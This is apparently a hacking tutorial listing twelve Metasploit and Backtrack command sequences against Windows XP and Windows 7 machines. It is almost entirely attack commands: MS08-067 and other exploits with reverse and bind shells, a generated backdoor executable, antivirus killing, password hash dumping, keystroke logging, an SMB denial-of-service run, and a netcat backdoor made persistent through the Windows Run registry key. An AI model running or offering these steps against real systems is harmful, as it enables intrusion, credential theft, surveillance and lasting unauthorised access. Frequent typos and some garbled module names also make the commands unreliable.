Some Metasploit Attacks

today i will show you Some metasploit attacks.

Requirement:-

Backtrack.

Metasploit.

These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.

Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit

Attack 2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1 ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell

Attack 3. Hacking By Metasploit . Windows xp Sp3 
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1 --->ip attacker
set RHOST 192.168.1.1 ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit

Attack 4: Hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1 ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192. ------>ip target
set RPORT 4321
show options
exploit

Attack 5: Exploit vulnerability in Windows 7
sudo nmap 192.168.1.1 ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1 -----------ip target
set RPORT 445
run ----run the exploit

Attack 6: Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1 --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen

Attack 7: ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7 --ip target
exploit

Attack 8: IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/ ---enter
wait a few moments...

Attack 9: metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1 ---->ip target
set LHOST 192.168.0.1 ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir

Attack 10: Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555

Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3 ---------->msf.exe
cd /pentest/exploits/SET# cd ..

/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer

Attack 12:ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\